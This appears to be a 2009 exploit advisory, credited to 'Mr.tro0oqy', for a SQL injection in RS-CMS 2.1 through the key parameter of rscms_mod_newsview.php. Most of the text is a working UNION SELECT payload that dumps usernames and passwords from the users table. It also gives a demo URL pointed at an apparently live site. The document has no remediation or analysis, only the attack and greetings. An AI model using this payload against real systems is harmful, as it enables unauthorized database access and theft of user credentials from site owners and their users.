rscms-sql.txt
Posted on 23 June 2009
======================================================= +++++++++++++++++++ information +++++++++++++++++++++++ ======================================================= [+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability [+] Found by : Mr.tro0oqy [+] C0ntact : t.4@windowslive.com <Yemeni ana> ======================================================= +++++++++++++++++++++++ Exploit +++++++++++++++++++++++ ======================================================= BUGS ==== Sql Injections: rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users-- DEMO ==== http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users-- ======================================================= ++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ ======================================================= all my Friends
